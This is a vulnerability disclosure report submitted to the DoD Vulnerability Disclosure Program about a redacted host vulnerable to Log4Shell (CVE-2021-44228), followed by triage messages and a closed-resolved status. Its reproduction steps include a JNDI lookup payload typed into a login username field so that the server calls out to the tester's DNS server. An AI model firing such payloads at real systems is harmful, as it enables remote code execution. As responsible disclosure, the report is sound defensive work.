Loading HuntDB...

███ ████████ running a vulnerable log4j

Critical
U
U.S. Dept Of Defense
Submitted None
Reported by alex_gaynor

Vulnerability Details

Technical details and impact analysis

Use of Externally-Controlled Format String
#Report **Description:** https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228 ## Impact Probably arbitrary code execution ## System Host(s) ███████ ## Affected Product(s) and Version(s) ## CVE Numbers CVE-2021-44228 ## Steps to Reproduce 1. Browse to https://██████████/█████████https%3A%2F%2F███%2F 2. Enter a `${jndi:ldap://dns-server-yoi-control/a}` into the username field 3. Enter a random password 4. Submit Observe that a request was made to your DNS server. This strongly suggests a vulnerable log4j. ## Suggested Mitigation/Remediation Actions Update log4j or disable jndi support. #Activity Timeline 2021-12-10 18:16 (-0600) (comment) Greetings from the Department of Defense (DoD), Thank you for supporting the DoD Vulnerability Disclosure Program (VDP). By submitting this report, you acknowledge understanding of, and agreement to, the DoD Vulnerability Disclosure Policy as detailed at @DeptofDefense. The VDP Team will review your report to ensure compliance with the DoD Vulnerability Disclosure Policy. If your report is determined to be out-of-scope, it will be closed without action. We will attempt to validate in-scope vulnerability reports and may request additional information from you if necessary. We will forward reports with validated vulnerabilities to DoD system owners for their action. Our goal is to provide you with status updates not less than every two weeks until the reported vulnerability is resolved. Regards, The VDP Team --- 2021-12-13 08:29 (-0600): @agent-l8 (report severity updated) null --- 2021-12-13 08:29 (-0600): @agent-l8 (bug triaged) Greetings, We have validated the vulnerability you reported and are preparing to forward this report to the affected DoD system owner for resolution. Thank you for bringing this vulnerability to our attention! We will endeavor to answer any questions the system owners may have regarding this report; however, there is a possibility we will need to contact you if they require more information to resolve the vulnerability. You will receive another status update after we have confirmed your report has been resolved by the system owner. If you have any questions, please let me know. Thanks again for supporting the DoD Vulnerability Disclosure Program. Regards, The VDP Team ---

Related CVEs

Associated Common Vulnerabilities and Exposures

Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from …

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Use of Externally-Controlled Format String